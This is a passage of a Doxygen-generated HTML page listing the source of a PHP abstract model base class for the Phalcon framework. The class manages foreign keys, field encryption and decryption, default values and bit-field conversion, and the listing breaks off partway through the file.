id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> </ul> </div> </div><!-- top --> <div id="side-nav" class="ui-resizable side-nav-resizable"> <div id="nav-tree"> <div id="nav-tree-contents"> <div id="nav-sync" class="sync"></div> </div> </div> <div id="splitbar" style="-moz-user-select:none;" class="ui-resizable-handle"> </div> </div> <script type="text/javascript"> $(document).ready(function(){initNavTree('_apprecie_model_base_8php_source.html','');}); </script> <div id="doc-content"> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Data Structures</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="header"> <div class="headertitle"> <div class="title">ApprecieModelBase.php</div> </div> </div><!--header--> <div class="contents"> <div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span>&#160;&lt;?php</div> <div class="line"><a name="l00009"></a><span class="lineno"><a class="line" href="namespace_apprecie_1_1_library_1_1_model.html"> 9</a></span>&#160;<span class="keyword">namespace </span><a class="code" href="namespace_apprecie_1_1_library_1_1_model.html">Apprecie\Library\Model</a>;</div> <div class="line"><a name="l00010"></a><span class="lineno"> 10</span>&#160;</div> <div class="line"><a name="l00011"></a><span class="lineno"> 11</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_collections_1_1_can_register.html">Apprecie\Library\Collections\CanRegister</a>;</div> <div class="line"><a name="l00012"></a><span class="lineno"> 12</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_collections_1_1_is_registry.html">Apprecie\Library\Collections\IsRegistry</a>;</div> <div class="line"><a name="l00013"></a><span class="lineno"> 13</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_collections_1_1_registry.html">Apprecie\Library\Collections\Registry</a>;</div> <div class="line"><a name="l00014"></a><span class="lineno"> 14</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_messaging_1_1_private_message_queue.html">Apprecie\Library\Messaging\PrivateMessageQueue</a>;</div> <div class="line"><a name="l00015"></a><span class="lineno"> 15</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_manager.html">Apprecie\Library\Security\EncryptionManager</a>;</div> <div class="line"><a name="l00016"></a><span class="lineno"> 16</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_security_1_1_encryption_provider.html">Apprecie\Library\Security\EncryptionProvider</a>;</div> <div class="line"><a name="l00017"></a><span class="lineno"> 17</span>&#160;use <a class="code" href="namespace_apprecie_1_1_library_1_1_tracing_1_1_activity_trace_trait.html">Apprecie\Library\Tracing\ActivityTraceTrait</a>;</div> <div class="line"><a name="l00018"></a><span class="lineno"> 18</span>&#160;use <a class="code" href="namespace_phalcon_1_1_db_1_1_raw_value.html">Phalcon\Db\RawValue</a>;</div> <div class="line"><a name="l00019"></a><span class="lineno"> 19</span>&#160;use <a class="code" href="namespace_phalcon_1_1_exception.html">Phalcon\Exception</a>;</div> <div class="line"><a name="l00020"></a><span class="lineno"> 20</span>&#160;use <a class="code" href="namespace_phalcon_1_1_mvc_1_1_model_1_1_message.html">Phalcon\Mvc\Model\Message</a>;</div> <div class="line"><a name="l00021"></a><span class="lineno"> 21</span>&#160;use <a class="code" href="namespace_phalcon_1_1_mvc_1_1_model_1_1_message_interface.html">Phalcon\Mvc\Model\MessageInterface</a>;</div> <div class="line"><a name="l00022"></a><span class="lineno"> 22</span>&#160;use <a class="code" href="namespace_phalcon_1_1_mvc_1_1_model.html">Phalcon\Mvc\Model</a>;</div> <div class="line"><a name="l00023"></a><span class="lineno"> 23</span>&#160;use <a class="code" href="namespace_phalcon_1_1_security.html">Phalcon\Security</a>;</div> <div class="line"><a name="l00024"></a><span class="lineno"> 24</span>&#160;</div> <div class="line"><a name="l00052"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html"> 52</a></span>&#160;<span class="keyword">abstract</span> <span class="keyword">class </span><a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> <span class="keyword">extends</span> \Phalcon\Mvc\Model implements <a class="code" href="interface_apprecie_1_1_library_1_1_collections_1_1_can_register.html">CanRegister</a></div> <div class="line"><a name="l00053"></a><span class="lineno"> 53</span>&#160;{</div> <div class="line"><a name="l00054"></a><span class="lineno"> 54</span>&#160; use <a class="code" href="namespace_activity_trace_trait.html">ActivityTraceTrait</a>;</div> <div class="line"><a name="l00055"></a><span class="lineno"> 55</span>&#160;</div> <div class="line"><a name="l00056"></a><span class="lineno"> 56</span>&#160; <span class="keyword">protected</span> $_defaultFields = array();</div> <div class="line"><a name="l00057"></a><span class="lineno"> 57</span>&#160; <span class="keyword">protected</span> $_encryptedFields = array();</div> <div class="line"><a name="l00058"></a><span class="lineno"> 58</span>&#160; <span class="keyword">protected</span> $_bitFields = array();</div> <div class="line"><a name="l00059"></a><span class="lineno"> 59</span>&#160; <span class="keyword">protected</span> $_isDecrypted = <span class="keyword">true</span>;</div> <div class="line"><a name="l00060"></a><span class="lineno"> 60</span>&#160; <span class="keyword">protected</span> $_encryptionProvider = null;</div> <div class="line"><a name="l00061"></a><span class="lineno"> 61</span>&#160; <span class="keyword">protected</span> $_hash = null;</div> <div class="line"><a name="l00062"></a><span class="lineno"> 62</span>&#160; <span class="keyword">protected</span> $_parentIsTableBase = <span class="keyword">false</span>;</div> <div class="line"><a name="l00063"></a><span class="lineno"> 63</span>&#160; <span class="keyword">protected</span> $_parentTransaction = null;</div> <div class="line"><a name="l00064"></a><span class="lineno"> 64</span>&#160; <span class="keyword">protected</span> $_foreignKeyField = null;</div> <div class="line"><a name="l00065"></a><span class="lineno"> 65</span>&#160;</div> <div class="line"><a name="l00066"></a><span class="lineno"> 66</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> setParentIsTableBase($value)</div> <div class="line"><a name="l00067"></a><span class="lineno"> 67</span>&#160; {</div> <div class="line"><a name="l00068"></a><span class="lineno"> 68</span>&#160; $this-&gt;_parentIsTableBase = $value;</div> <div class="line"><a name="l00069"></a><span class="lineno"> 69</span>&#160; }</div> <div class="line"><a name="l00070"></a><span class="lineno"> 70</span>&#160;</div> <div class="line"><a name="l00071"></a><span class="lineno"> 71</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> getParentIsTableBase()</div> <div class="line"><a name="l00072"></a><span class="lineno"> 72</span>&#160; {</div> <div class="line"><a name="l00073"></a><span class="lineno"> 73</span>&#160; <span class="keywordflow">return</span> $this-&gt;_parentIsTableBase;</div> <div class="line"><a name="l00074"></a><span class="lineno"> 74</span>&#160; }</div> <div class="line"><a name="l00075"></a><span class="lineno"> 75</span>&#160;</div> <div class="line"><a name="l00076"></a><span class="lineno"> 76</span>&#160;<span class="preprocessor"> #region properties / getters / setters</span></div> <div class="line"><a name="l00077"></a><span class="lineno"> 77</span>&#160;</div> <div class="line"><a name="l00078"></a><span class="lineno"> 78</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> getForeignKeyField()</div> <div class="line"><a name="l00079"></a><span class="lineno"> 79</span>&#160; {</div> <div class="line"><a name="l00080"></a><span class="lineno"> 80</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_foreignKeyField == null) {</div> <div class="line"><a name="l00081"></a><span class="lineno"> 81</span>&#160; $this-&gt;calculateForeignKeyField();</div> <div class="line"><a name="l00082"></a><span class="lineno"> 82</span>&#160; }</div> <div class="line"><a name="l00083"></a><span class="lineno"> 83</span>&#160;</div> <div class="line"><a name="l00084"></a><span class="lineno"> 84</span>&#160; <span class="keywordflow">return</span> $this-&gt;_foreignKeyField;</div> <div class="line"><a name="l00085"></a><span class="lineno"> 85</span>&#160; }</div> <div class="line"><a name="l00086"></a><span class="lineno"> 86</span>&#160;</div> <div class="line"><a name="l00087"></a><span class="lineno"> 87</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> getForeignKey()</div> <div class="line"><a name="l00088"></a><span class="lineno"> 88</span>&#160; {</div> <div class="line"><a name="l00089"></a><span class="lineno"> 89</span>&#160; <span class="keywordflow">if</span> (!$this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00090"></a><span class="lineno"> 90</span>&#160; <span class="keywordflow">return</span> null;</div> <div class="line"><a name="l00091"></a><span class="lineno"> 91</span>&#160; }</div> <div class="line"><a name="l00092"></a><span class="lineno"> 92</span>&#160;</div> <div class="line"><a name="l00093"></a><span class="lineno"> 93</span>&#160; $field = $this-&gt;getForeignKeyField();</div> <div class="line"><a name="l00094"></a><span class="lineno"> 94</span>&#160;</div> <div class="line"><a name="l00095"></a><span class="lineno"> 95</span>&#160; <span class="keywordflow">return</span> $this-&gt;$field;</div> <div class="line"><a name="l00096"></a><span class="lineno"> 96</span>&#160; }</div> <div class="line"><a name="l00097"></a><span class="lineno"> 97</span>&#160;</div> <div class="line"><a name="l00098"></a><span class="lineno"> 98</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> setForeignKey($value)</div> <div class="line"><a name="l00099"></a><span class="lineno"> 99</span>&#160; {</div> <div class="line"><a name="l00100"></a><span class="lineno"> 100</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00101"></a><span class="lineno"> 101</span>&#160; $field = $this-&gt;getForeignKeyField();</div> <div class="line"><a name="l00102"></a><span class="lineno"> 102</span>&#160; $this-&gt;$field = $value;</div> <div class="line"><a name="l00103"></a><span class="lineno"> 103</span>&#160; }</div> <div class="line"><a name="l00104"></a><span class="lineno"> 104</span>&#160; }</div> <div class="line"><a name="l00105"></a><span class="lineno"> 105</span>&#160;</div> <div class="line"><a name="l00106"></a><span class="lineno"> 106</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> getHash()</div> <div class="line"><a name="l00107"></a><span class="lineno"> 107</span>&#160; {</div> <div class="line"><a name="l00108"></a><span class="lineno"> 108</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_hash == null) {</div> <div class="line"><a name="l00109"></a><span class="lineno"> 109</span>&#160; $this-&gt;_hash = uniqid(spl_object_hash($this), <span class="keyword">true</span>);</div> <div class="line"><a name="l00110"></a><span class="lineno"> 110</span>&#160; }</div> <div class="line"><a name="l00111"></a><span class="lineno"> 111</span>&#160;</div> <div class="line"><a name="l00112"></a><span class="lineno"> 112</span>&#160; <span class="keywordflow">return</span> $this-&gt;_hash;</div> <div class="line"><a name="l00113"></a><span class="lineno"> 113</span>&#160; }</div> <div class="line"><a name="l00114"></a><span class="lineno"> 114</span>&#160;</div> <div class="line"><a name="l00118"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ad19aac92fbb93ec650e8550389bb6be5"> 118</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ad19aac92fbb93ec650e8550389bb6be5">getIsDecrypted</a>()</div> <div class="line"><a name="l00119"></a><span class="lineno"> 119</span>&#160; {</div> <div class="line"><a name="l00120"></a><span class="lineno"> 120</span>&#160; <span class="keywordflow">return</span> $this-&gt;_isDecrypted;</div> <div class="line"><a name="l00121"></a><span class="lineno"> 121</span>&#160; }</div> <div class="line"><a name="l00122"></a><span class="lineno"> 122</span>&#160;</div> <div class="line"><a name="l00131"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8529f9f3816efe674ad907bd1a2360d0"> 131</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8529f9f3816efe674ad907bd1a2360d0">setDefaultFields</a>($default)</div> <div class="line"><a name="l00132"></a><span class="lineno"> 132</span>&#160; {</div> <div class="line"><a name="l00133"></a><span class="lineno"> 133</span>&#160; <span class="keywordflow">if</span> (!is_array($default)) {</div> <div class="line"><a name="l00134"></a><span class="lineno"> 134</span>&#160; $default = array($default);</div> <div class="line"><a name="l00135"></a><span class="lineno"> 135</span>&#160; }</div> <div class="line"><a name="l00136"></a><span class="lineno"> 136</span>&#160; $this-&gt;_defaultFields = $default;</div> <div class="line"><a name="l00137"></a><span class="lineno"> 137</span>&#160; }</div> <div class="line"><a name="l00138"></a><span class="lineno"> 138</span>&#160;</div> <div class="line"><a name="l00147"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a4bcc03e29cd5ea33ad13de858065135e"> 147</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a4bcc03e29cd5ea33ad13de858065135e">setEncryptedFields</a>($encrypted)</div> <div class="line"><a name="l00148"></a><span class="lineno"> 148</span>&#160; {</div> <div class="line"><a name="l00149"></a><span class="lineno"> 149</span>&#160; <span class="keywordflow">if</span> (!is_array($encrypted)) {</div> <div class="line"><a name="l00150"></a><span class="lineno"> 150</span>&#160; $encrypted = array($encrypted);</div> <div class="line"><a name="l00151"></a><span class="lineno"> 151</span>&#160; }</div> <div class="line"><a name="l00152"></a><span class="lineno"> 152</span>&#160; $this-&gt;_encryptedFields = $encrypted;</div> <div class="line"><a name="l00153"></a><span class="lineno"> 153</span>&#160; }</div> <div class="line"><a name="l00154"></a><span class="lineno"> 154</span>&#160;</div> <div class="line"><a name="l00158"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab800a096b48dc7cfc539549ba02367ac"> 158</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab800a096b48dc7cfc539549ba02367ac">getEncryptedFields</a>()</div> <div class="line"><a name="l00159"></a><span class="lineno"> 159</span>&#160; {</div> <div class="line"><a name="l00160"></a><span class="lineno"> 160</span>&#160; <span class="keywordflow">return</span> $this-&gt;_encryptedFields;</div> <div class="line"><a name="l00161"></a><span class="lineno"> 161</span>&#160; }</div> <div class="line"><a name="l00162"></a><span class="lineno"> 162</span>&#160;</div> <div class="line"><a name="l00166"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae84b7722a75fa5c37ef628503346b7f9"> 166</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae84b7722a75fa5c37ef628503346b7f9">getDefaultFields</a>()</div> <div class="line"><a name="l00167"></a><span class="lineno"> 167</span>&#160; {</div> <div class="line"><a name="l00168"></a><span class="lineno"> 168</span>&#160; <span class="keywordflow">return</span> $this-&gt;_defaultFields;</div> <div class="line"><a name="l00169"></a><span class="lineno"> 169</span>&#160; }</div> <div class="line"><a name="l00170"></a><span class="lineno"> 170</span>&#160;</div> <div class="line"><a name="l00180"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a24ccf01c74e7f030e5463fa2818e1945"> 180</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a24ccf01c74e7f030e5463fa2818e1945">setEncryptionProvider</a>(<a class="code" href="interface_apprecie_1_1_library_1_1_security_1_1_encryption_provider.html">EncryptionProvider</a> $provider)</div> <div class="line"><a name="l00181"></a><span class="lineno"> 181</span>&#160; {</div> <div class="line"><a name="l00182"></a><span class="lineno"> 182</span>&#160; $this-&gt;getDI()-&gt;get(<span class="stringliteral">&#39;encRegistry&#39;</span>)-&gt;setInstance($this, $provider);</div> <div class="line"><a name="l00183"></a><span class="lineno"> 183</span>&#160; }</div> <div class="line"><a name="l00184"></a><span class="lineno"> 184</span>&#160;</div> <div class="line"><a name="l00188"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#afaa69691910f5f8f0197722d23ec2f88"> 188</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#afaa69691910f5f8f0197722d23ec2f88">getEncryptionProvider</a>()</div> <div class="line"><a name="l00189"></a><span class="lineno"> 189</span>&#160; {</div> <div class="line"><a name="l00190"></a><span class="lineno"> 190</span>&#160; <span class="keywordflow">return</span> $this-&gt;getDI()-&gt;get(<span class="stringliteral">&#39;encRegistry&#39;</span>)-&gt;getInstance($this);</div> <div class="line"><a name="l00191"></a><span class="lineno"> 191</span>&#160; }</div> <div class="line"><a name="l00192"></a><span class="lineno"> 192</span>&#160;</div> <div class="line"><a name="l00197"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab84cf90eeb87f09b54c0bb9cfae0844b"> 197</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab84cf90eeb87f09b54c0bb9cfae0844b">createEncryptionProvider</a>()</div> <div class="line"><a name="l00198"></a><span class="lineno"> 198</span>&#160; {</div> <div class="line"><a name="l00199"></a><span class="lineno"> 199</span>&#160; <span class="keywordflow">return</span> <a class="code" href="class_apprecie_1_1_library_1_1_security_1_1_encryption_manager.html#aea94b93be7ee5f392d5c19ecb522f0f7">EncryptionManager::get</a>($this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9c31aa52b6e4dee9f0f9f6c3f617896f">getEncryptionKey</a>());</div> <div class="line"><a name="l00200"></a><span class="lineno"> 200</span>&#160; }</div> <div class="line"><a name="l00201"></a><span class="lineno"> 201</span>&#160;</div> <div class="line"><a name="l00207"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9c31aa52b6e4dee9f0f9f6c3f617896f"> 207</a></span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a9c31aa52b6e4dee9f0f9f6c3f617896f">getEncryptionKey</a>()</div> <div class="line"><a name="l00208"></a><span class="lineno"> 208</span>&#160; {</div> <div class="line"><a name="l00209"></a><span class="lineno"> 209</span>&#160; $key1 = $this-&gt;getDI()-&gt;get(<span class="stringliteral">&#39;portalid&#39;</span>);</div> <div class="line"><a name="l00210"></a><span class="lineno"> 210</span>&#160; $key2 = $this-&gt;getDI()-&gt;get(<span class="stringliteral">&#39;fieldkey&#39;</span>);</div> <div class="line"><a name="l00211"></a><span class="lineno"> 211</span>&#160; <span class="keywordflow">return</span> $key1 . $key2;</div> <div class="line"><a name="l00212"></a><span class="lineno"> 212</span>&#160; }</div> <div class="line"><a name="l00213"></a><span class="lineno"> 213</span>&#160;</div> <div class="line"><a name="l00214"></a><span class="lineno"> 214</span>&#160;<span class="preprocessor"> #endregion</span></div> <div class="line"><a name="l00215"></a><span class="lineno"> 215</span>&#160;</div> <div class="line"><a name="l00216"></a><span class="lineno"> 216</span>&#160;<span class="preprocessor"> #region public methods</span></div> <div class="line"><a name="l00217"></a><span class="lineno"> 217</span>&#160;</div> <div class="line"><a name="l00218"></a><span class="lineno"> 218</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <span class="keyword">register</span>(<a class="code" href="interface_apprecie_1_1_library_1_1_collections_1_1_is_registry.html">IsRegistry</a> $register, $key, $name)</div> <div class="line"><a name="l00219"></a><span class="lineno"> 219</span>&#160; {</div> <div class="line"><a name="l00220"></a><span class="lineno"> 220</span>&#160; <span class="keywordflow">if</span> ($name == <span class="stringliteral">&#39;modelencryption&#39;</span>) {</div> <div class="line"><a name="l00221"></a><span class="lineno"> 221</span>&#160; $register-&gt;setInstance($key, $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab84cf90eeb87f09b54c0bb9cfae0844b">createEncryptionProvider</a>());</div> <div class="line"><a name="l00222"></a><span class="lineno"> 222</span>&#160; }</div> <div class="line"><a name="l00223"></a><span class="lineno"> 223</span>&#160; }</div> <div class="line"><a name="l00224"></a><span class="lineno"> 224</span>&#160;</div> <div class="line"><a name="l00235"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a2e694a13a253400ce9b1560c63962553"> 235</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a2e694a13a253400ce9b1560c63962553">isEncryptionField</a>($field)</div> <div class="line"><a name="l00236"></a><span class="lineno"> 236</span>&#160; {</div> <div class="line"><a name="l00237"></a><span class="lineno"> 237</span>&#160; <span class="keywordflow">return</span> in_array($field, $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ab800a096b48dc7cfc539549ba02367ac">getEncryptedFields</a>());</div> <div class="line"><a name="l00238"></a><span class="lineno"> 238</span>&#160; }</div> <div class="line"><a name="l00239"></a><span class="lineno"> 239</span>&#160;</div> <div class="line"><a name="l00253"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#abf330a837c0889228c7b62bc18af99b5"> 253</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#abf330a837c0889228c7b62bc18af99b5">encryptFields</a>()</div> <div class="line"><a name="l00254"></a><span class="lineno"> 254</span>&#160; {</div> <div class="line"><a name="l00255"></a><span class="lineno"> 255</span>&#160; <span class="keywordflow">if</span> (count($this-&gt;_encryptedFields) &gt; 0 &amp;&amp; $this-&gt;_isDecrypted) {</div> <div class="line"><a name="l00256"></a><span class="lineno"> 256</span>&#160;</div> <div class="line"><a name="l00257"></a><span class="lineno"> 257</span>&#160; $encrypt = $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#afaa69691910f5f8f0197722d23ec2f88">getEncryptionProvider</a>();</div> <div class="line"><a name="l00258"></a><span class="lineno"> 258</span>&#160;</div> <div class="line"><a name="l00259"></a><span class="lineno"> 259</span>&#160; <span class="keywordflow">foreach</span> ($this-&gt;_encryptedFields as $field) {</div> <div class="line"><a name="l00260"></a><span class="lineno"> 260</span>&#160; <span class="keywordflow">if</span> (isset($this-&gt;$field) &amp;&amp; is_string($this-&gt;$field)) {</div> <div class="line"><a name="l00261"></a><span class="lineno"> 261</span>&#160; $this-&gt;$field = $encrypt-&gt;encrypt($this-&gt;$field);</div> <div class="line"><a name="l00262"></a><span class="lineno"> 262</span>&#160; }</div> <div class="line"><a name="l00263"></a><span class="lineno"> 263</span>&#160; }</div> <div class="line"><a name="l00264"></a><span class="lineno"> 264</span>&#160;</div> <div class="line"><a name="l00265"></a><span class="lineno"> 265</span>&#160; $this-&gt;_isDecrypted = <span class="keyword">false</span>;</div> <div class="line"><a name="l00266"></a><span class="lineno"> 266</span>&#160; }</div> <div class="line"><a name="l00267"></a><span class="lineno"> 267</span>&#160; }</div> <div class="line"><a name="l00268"></a><span class="lineno"> 268</span>&#160;</div> <div class="line"><a name="l00282"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b"> 282</a></span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">decryptFields</a>()</div> <div class="line"><a name="l00283"></a><span class="lineno"> 283</span>&#160; {</div> <div class="line"><a name="l00284"></a><span class="lineno"> 284</span>&#160; <span class="keywordflow">if</span> (count($this-&gt;_encryptedFields) &gt; 0 &amp;&amp; !$this-&gt;_isDecrypted) {</div> <div class="line"><a name="l00285"></a><span class="lineno"> 285</span>&#160;</div> <div class="line"><a name="l00286"></a><span class="lineno"> 286</span>&#160; $encrypt = $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#afaa69691910f5f8f0197722d23ec2f88">getEncryptionProvider</a>();</div> <div class="line"><a name="l00287"></a><span class="lineno"> 287</span>&#160;</div> <div class="line"><a name="l00288"></a><span class="lineno"> 288</span>&#160; <span class="keywordflow">foreach</span> ($this-&gt;_encryptedFields as $field) {</div> <div class="line"><a name="l00289"></a><span class="lineno"> 289</span>&#160; <span class="keywordflow">if</span> (isset($this-&gt;$field) &amp;&amp; is_string($this-&gt;$field)) {</div> <div class="line"><a name="l00290"></a><span class="lineno"> 290</span>&#160; $this-&gt;$field = $encrypt-&gt;decrypt($this-&gt;$field);</div> <div class="line"><a name="l00291"></a><span class="lineno"> 291</span>&#160; }</div> <div class="line"><a name="l00292"></a><span class="lineno"> 292</span>&#160; }</div> <div class="line"><a name="l00293"></a><span class="lineno"> 293</span>&#160;</div> <div class="line"><a name="l00294"></a><span class="lineno"> 294</span>&#160; $this-&gt;_isDecrypted = <span class="keyword">true</span>;</div> <div class="line"><a name="l00295"></a><span class="lineno"> 295</span>&#160; }</div> <div class="line"><a name="l00296"></a><span class="lineno"> 296</span>&#160; }</div> <div class="line"><a name="l00297"></a><span class="lineno"> 297</span>&#160;</div> <div class="line"><a name="l00298"></a><span class="lineno"> 298</span>&#160;<span class="preprocessor"> #endregion</span></div> <div class="line"><a name="l00299"></a><span class="lineno"> 299</span>&#160;</div> <div class="line"><a name="l00300"></a><span class="lineno"> 300</span>&#160;<span class="preprocessor"> #region protected methods</span></div> <div class="line"><a name="l00301"></a><span class="lineno"> 301</span>&#160;</div> <div class="line"><a name="l00310"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a5def8bf996218c5f74920eef290b1a89"> 310</a></span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a5def8bf996218c5f74920eef290b1a89">processDefaultValues</a>($onlyIfNull = <span class="keyword">true</span>)</div> <div class="line"><a name="l00311"></a><span class="lineno"> 311</span>&#160; {</div> <div class="line"><a name="l00312"></a><span class="lineno"> 312</span>&#160; <span class="keywordflow">foreach</span> ($this-&gt;_defaultFields as $field) {</div> <div class="line"><a name="l00313"></a><span class="lineno"> 313</span>&#160; $setDefault = !$onlyIfNull ? <span class="keyword">true</span> : is_null($this-&gt;$field);</div> <div class="line"><a name="l00314"></a><span class="lineno"> 314</span>&#160; <span class="keywordflow">if</span> ($setDefault) {</div> <div class="line"><a name="l00315"></a><span class="lineno"> 315</span>&#160; $this-&gt;$field = new \Phalcon\Db\RawValue(<span class="stringliteral">&#39;default&#39;</span>);</div> <div class="line"><a name="l00316"></a><span class="lineno"> 316</span>&#160; }</div> <div class="line"><a name="l00317"></a><span class="lineno"> 317</span>&#160; }</div> <div class="line"><a name="l00318"></a><span class="lineno"> 318</span>&#160; }</div> <div class="line"><a name="l00319"></a><span class="lineno"> 319</span>&#160;</div> <div class="line"><a name="l00326"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a12751dcdf42f432256a7455df5c3a663"> 326</a></span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a12751dcdf42f432256a7455df5c3a663">processBitValues</a>()</div> <div class="line"><a name="l00327"></a><span class="lineno"> 327</span>&#160; {</div> <div class="line"><a name="l00328"></a><span class="lineno"> 328</span>&#160; $fields = $this-&gt;getModelsMetaData()-&gt;getAttributes($this);</div> <div class="line"><a name="l00329"></a><span class="lineno"> 329</span>&#160; <span class="keywordflow">foreach</span> ($fields as $field) { <span class="comment">// = The record doesn&#39;t have a valid data snapshot at</span></div> <div class="line"><a name="l00330"></a><span class="lineno"> 330</span>&#160; <span class="keywordflow">if</span> (isset($this-&gt;$field) &amp;&amp; is_bool($this-&gt;$field)) {</div> <div class="line"><a name="l00331"></a><span class="lineno"> 331</span>&#160; $value = $this-&gt;$field === <span class="keyword">true</span> ? 1 : 0;</div> <div class="line"><a name="l00332"></a><span class="lineno"> 332</span>&#160; $this-&gt;$field = new \Phalcon\Db\RawValue(<span class="stringliteral">&quot;{$value}&quot;</span>);</div> <div class="line"><a name="l00333"></a><span class="lineno"> 333</span>&#160; $this-&gt;_bitFields[] = $field;</div> <div 